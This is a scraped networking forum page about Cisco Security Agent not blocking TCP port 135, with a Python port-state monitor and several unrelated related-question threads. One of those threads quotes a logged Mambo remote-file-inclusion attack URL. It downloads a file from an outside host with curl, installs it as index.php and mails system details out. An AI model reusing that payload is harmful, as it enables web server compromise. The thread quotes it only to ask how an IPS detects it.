Cisco Security Agent cannot close port 135/tcp on Windows hosts

Hello

I have run into the problem that Cisco Security Agent cannot close port 135/TCP on Windows PCs (XP or Win7).

I configured a network access control rule to prevent all client/server connections to port tcp/135.

I checked my policy using nmap: for about 20 minutes this port (TCP/135) shows as filtered and I see the connection events in the event monitor on the CSA MC; over the next 20 minutes it shows as open and no log entries appear. (The time is not exact; it may be 30 minutes or 5, it varies.)

Can someone explain how TCP/135 works and whether it is possible to close it using the CSA?

Thanks in advance

There is another question about the same problem on the forums (see: CSA 6.0.2.145 problem with windows firewall 7). There I wrote:

"I went ahead and tested in the lab with WinXP and CSA 602-149 (later). I defined a rule with DENY tcp/135 and ran nmap, and it reports open (Wireshark shows the SYN, SYN-ACK). I changed it to PRIORITY DENY and now nmap reports closed (Wireshark shows a reset to the SYN). Through the CLI, netstat -a shows the PC listening on tcp/135, and, disabling CSA, the SYN gets the SYN-ACK response. To me, this means a few flaws. 1: DENY should block the tcp/135 SYN, and 2: CSA does not send reset (it needs to be reset). Is it possible to open a TAC case and put my name (mwinnett) in it, and I'll open a defect."

Matthew
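
To put timestamps on the flapping described in this thread, the following added example (not code from either poster or from Cisco) probes one port at a fixed interval and records only the state changes, so they can be lined up against the events in the CSA MC. It uses a full TCP connect rather than nmap's SYN scan; the function names and the 192.0.2.10 address are placeholders.

```python
import socket
import time
from datetime import datetime, timezone


def classify(host, port, timeout=2.0):
    """Full TCP connect probe, mapped to the states nmap reports."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"        # SYN was answered with SYN-ACK
    except ConnectionRefusedError:
        return "closed"      # SYN was answered with RST
    except socket.timeout:
        return "filtered"    # SYN was dropped, nothing came back
    except OSError:
        return "filtered"    # e.g. ICMP unreachable from a filter
    finally:
        s.close()


def transitions(samples):
    """Collapse (timestamp, state) samples into state changes only."""
    changes, last = [], None
    for ts, state in samples:
        if state != last:
            changes.append((ts, last, state))
            last = state
    return changes


def watch(host, port, interval=60, rounds=60):
    """Probe every `interval` seconds and return the observed changes."""
    samples = []
    for _ in range(rounds):
        now = datetime.now(timezone.utc).isoformat(timespec="seconds")
        samples.append((now, classify(host, port)))
        time.sleep(interval)
    return transitions(samples)


if __name__ == "__main__":
    # 192.0.2.10 is a documentation address standing in for the test PC.
    for ts, old, new in watch("192.0.2.10", 135):
        print(ts, old, "->", new)
```

A change from "filtered" to "open" with no matching deny event on the management console at that timestamp is the window in which the rule was not being enforced.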


Similar Questions

  • Cisco security agents - Solaris zones

    Hello

    Can anyone help with a question about the CSA?

    Is there official information that Cisco Security Agent cannot be installed on Solaris zones? The release notes have information on Solaris versions, but not on zones.

    Please visit the following link:

    The system requirements for Solaris agents

    http://www.Cisco.com/en/us/docs/security/CSA/CSA601/Release_notes/CSA601RN.html#wp196425

    SongL

  • When does Cisco Security Agent 6.0.2 come out?

    When does Cisco Security Agent 6.0.2 come out?  Go off the 32-bit operating system and on Windows 2008 64-bit OS.

    Scheduled for this month.

  • Windows 2003 & Management Center for Cisco Security Agents

    I'm sorry if this question has been asked before, but I was unable to see the answer here.

    Can the CiscoWorks Management Center for Cisco Security Agents be installed on a Windows 2003 Server?

    I'm asking because I am finding it difficult to find a new server that comes with Windows 2000.

    I'm not in the office at the moment, but I think the version I have is 4.5.

    Thank you

    Ian

    You're welcome and good luck.

  • PHP exploit triggers Cisco Security Agent but NOT at Cisco IPS... why?

    Does anyone know what signature this exploit should trigger on the Cisco IPS sensor? We are not sure if there is one, or if we turned it off.

    We see this exploit hit our Exchange servers several times during the week.

    The process of "C:\WINNT\System32\inetsrv\inetinfo.exe" (as user NT AUTHORITY\SYSTEM) received the data ' / index2.php? option = com_content & do_pdf = 1 & id = 1index2.php? _REQUEST [option] = com_content & _REQUEST [Itemid] = 1 & GLOBALS = & mosConfig_absolute_path =http://220.194.57.112/~photo/cm?&cmd=cd%20cache;curl%20-O%20http: / / 220.194.57.112/~photo/cm;mv%20cm%20index.php;rm%20-rf%20cm*;uname%20-a%20|%20mail%20-s%20uname_i2_66. 224.194.188%[email protected] / * /; uname%20-a%20|%20Mail%20-s%20uname_i2_66.224.194.188%[email protected] / * /. com; echo |'.

    I think that this could be the Mambo exploit. See http://www.securityfocus.com/archive/1/archive/1/427196/100/0/threaded for the info. I searched on mambo MySDN and found GIS 5163 "Mambo Site Server Administration Password ByPass"; here is a snippet of the description: "administrative access is acquired by sending a specific url using the index2.php script and the PHPSESSID variable." This looks like what you pasted. Note "index2.php". Your IPS can not seen this so it was more than 443.

    Hope this helps

    M

  • Cisco Secure ACS 5.3 SNMP agent does not

    Hello

    I have problems with the SNMP agent on Cisco Secure ACS 5.3 (patch level 5) stopping; is there a quick way to restart the SNMP daemon via the command line?

    Robert,

    I understand where you are coming from; I encountered the following bug:

    CSCte39351

    The SNMP agent daemon process on the ACS appliance stops.

    Rebooting the box would bring it back up, and after about 3 days it would stop. I just want to see if it's the same bug that could be back in patch 5. The best thing to do at this stage is to plan a quick downtime and restart the box to see if the SNMP process starts again. If it does, then give it a week to see if the SNMP process goes down. If it does, then reference this bug and open a new TAC case for a fix. If not, then you should be in the clear.

    Thank you

    Tarik Admani

  • Vista Firewall blocks port 135, 445 of VPN connection

    Desktop computer is Vista x 64 Enterprise. I can access other computers at the office without any problem of file sharing. I am connected to the Home Office via VPN and I couldn't access the file sharing from my computer at home. After having turned off the firewall on the desktop computer, I was able to access file sharing. I found when the firewall is turned on, I can not telnet to port 135, 445 of my home computer, but I cannot telnet to these ports on another desktop computer.

    Computer is Windows 7 Pro.

    What changes can allow me access to the file sharing via VPN while keeping the firewall turned on?

    Ok. I found the answer by myself.

    Go to "Windows Firewall with Advanced Security" in "Administrative Tools".

    Select "Inbound Rules".

    Find the "File and Printer Sharing (SMB-In)" rule, Local Port 445. There are several of these rules. Select the active one that has the green button. The default setting for "Remote address" is "Local subnet". Change the "Remote address" to "Any". This works.

  • Cisco Secure ACS Solution Engine ping

    1. I installed Cisco Secure ACS Solution Engine V3.3 and I can access it via HTTP on port 2002, but I can't ping it from anywhere in the network, although the server can ping everything. Is this normal?

    2. If I can't ping it, how can I define the keepalive service to load balance 2 ACS engines using CSS?

    By the way, I forgot that the ACS 3.3 appliance has a CSA integrated. This agent is enabled by default. That explains why you can't ping it.

    To enable/disable it, go to "System Configuration - Appliance Configuration". Toggle the "CSA Enabled" checkbox as needed.

    http://www.Cisco.com/en/us/partner/products/sw/secursw/ps5338/products_user_guide_chapter09186a008023361d.html#wp859228

    Rgds,

    AK

  • TCP ip has reached the limit of security imposed on the number of tcp simultaneous connect

    Idle process original title: System, create tcp/ip connections to achieve maximum attempts allowed on win xp
    Continue to event viewer showing warning saying tcp/ip has reached the limit of security imposed on the number of tcp connect attempts simultaneous and system idle process, that's what causes this error.  To many connections 127.0.0.1:6999 127.0.0.1:4426 time_wait

    127.0.0.1:4427 TIME_WAIT
    etc etc etc.

    Hello

    Thanks for asking! If I have understood correctly, you receive the error message "TCP/IP has reached the security limit imposed on the number of simultaneous TCP connect attempts" in Event Viewer. I suggest you follow the troubleshooting steps below and check whether they help.

    1. Did you make any changes on the computer before the issue appeared?
    2. When exactly do you face the issue?
    3. What anti-virus is installed on the computer?

    Method 1:
    It is a warning that a malicious program or a virus may be running on the system. You can run the Microsoft Safety Scanner to make sure that the computer is free from virus infection:
    http://www.Microsoft.com/security/scanner/en-us/default.aspx
    WARNING:
    If you run the scan, a program that is infected by the virus will get deleted. Therefore, reinstall the program. Also, if files and folders are affected by the virus, they might get deleted as well.

    Method 2:
    Check the behavior by starting the computer in a clean boot state. How to configure Windows XP to start in a "clean boot" State
    http://support.Microsoft.com/kb/310353
    Note: When the diagnosis is complete do not forget to reset the computer to a normal startup. Follow step 7 in the above article.

    Method 3:
    Please close some of the connections (some types of downloads can use multiple connections).

    Check out the link:
    http://www.Microsoft.com/technet/support/ee/transform.aspx?ProdName=Windows+operating+system&ProdVer=5.2&EvtID=4226&EvtSrc=Tcpip&lcid=1033

    Please follow these recommended steps, review the additional information provided and post back if you still experience the problem. I'd be happy to help you further.

  • Cisco ASA 5500 Series 4-Port GE SSM

    Currently, we have 2 ASA 5510 firewalls and need to add the Cisco ASA 5500 Series 4-Port GE SSM expansion module. Can it be added while the device is turned on and running, or must the firewall be turned off to install it?

    Hello

    You could try asking the firewall team this question, as this page is the community for physical security and video surveillance.  The firewall team is located here:

    https://supportforums.Cisco.com/community/NetPro/security/firewall

  • With Cisco Secure ACS for Windows GANYMEDE +, authentication fails with AD

    I'll put up a Cisco Secure ACS 4.2 server to act as a RADIUS server for switches and routers I use Windows 2003 server for the candidate countries.
    and an Active Directory of Windows 2003 server.  The ad server is very good, it is used for many other things.

    I've implemented ACS as defined in the installation guide, including all the steps in the "Member Server" section of the installation guide
    for using AD as an external database (e.g. setting up services to run with a domain administrator account, setting up a machine called "CISCO"
    in the domain, etc.).

    I've set the unknown user policy to use the Windows database if the internal database does not contain the details of the user.

    If I add a user to the internal database, authentication goes through fine, with an entry in the journal "Authentication," spent

    02-24-2010, 05:07:03, authentic failed, eXXXX, Network Administrators (NDG), X.X.X.X, (default), internal error, (get the internal error error message)

    I scoured Google etc. and just cannot come up with any reason why this should be the case.
    I followed all of the installation guides to the letter.  I need to get this up and running as soon as possible,
    so I am eager to know if someone can help me with this one!

    Thanks and greetings

    Sharan

    George,

    Internal error is fairly generic, but a common situation, we see this error is when ACS is installed on a

    64-bit computer.  ACS would not work with the active Manager when it is installed on the 64-bit before machines

    ACS 4.2.1.

    -Jesse

  • Email from bad security. Cannot reset security questions. catch 22! Help.

    Email from bad security. Cannot reset security questions. catch 22! Help.

    Try to use the service of Julian inconu of Apple. If you cannot reset their through it, you'll have to ask security team account Apple to reset your security questions. To contact them, click here and choose a method; If this page does not list one for your country or if you are unable to call, complete and submit this form.


  • Professional information package launched by mistake on my Mac. Since then, the computer is out of order.  The app is always open to the dock, but cannot close or force quit it. Power button doesn, t make a stop. Computer is NOT frozen, but apps does not

    Professional information file on my Mac. Since then, the computer is out of order.  App always opens in the dock, but cannot close or force quit it. Start button / stop is not make a judgment. Computer is NOT frozen, but apps does not open. Cannot shut down, restart, or use something else! Help!

    If you hold the button power for more than 10 seconds, it will not shut the MBP?

    Try a SMC reset:

    https://support.Apple.com/en-us/HT201295

    Ciao.

  • Cannot close the first with other (LH one end) tab open are closed.

    Cannot close the first tab (end of LH we) but others are closing. Indicator download on tab keeps indefinitely - running windows under all the tabs are functioning normally.
    Open another copy of Firefox allows all tabs to work normally in this copy

    If this does not work in mode without failure, then disable all extensions and then try to find out who is the cause by allowing both the problem reappears.

    • Choose "Disable all add-ons" on issues to troubleshoot Firefox in Safe Mode to set window to disable all extensions.
    • Close and restart Firefox after each change through "file > exit ' (Mac: ' Firefox > leave";) Linux: "file > exit ')

    See Troubleshooting extensions and themes and problems of hardware acceleration to resolve common Firefox problems

  • Error: Failed Application path: C:\Program Files (x86)\Trend Micro\Client Server Security Agent\HostedAgent\svcGenericHost.exe

    original title: generic hosted agent services

    Description

    The failing Application path: C:\Program Files (x86)\Trend Micro\Client Server Security Agent\HostedAgent\svcGenericHost.exe

    Signature of the problem

    Problem event name: APPCRASH

    Application name: svcGenericHost.exe

    Application version: 3.5.0.1163

    Application timestamp: 4d9d3841

    Fault Module name: StackHash_0a9e

    Fault Module Version: 0.0.0.0

    Fault Module Timestamp: 00000000

    Exception code: c0000005

    Exception offset: 74676c9c

    OS version: 6.1.7601.2.1.0.768.3

    Locale ID: 1033

    Additional information 1: 0a9e

    More information 2: 0a9e372d3b4ad19135b953a78882e789

    Additional information 3: 0a9e

    Additional information 4: 0a9e372d3b4ad19135b953a78882e789

    Additional information about the problem

    Bucket ID: 2507689456

    Maybe you should check with Trend Micro support.

    http://eSupport.trendmicro.com/en-us/default.aspx
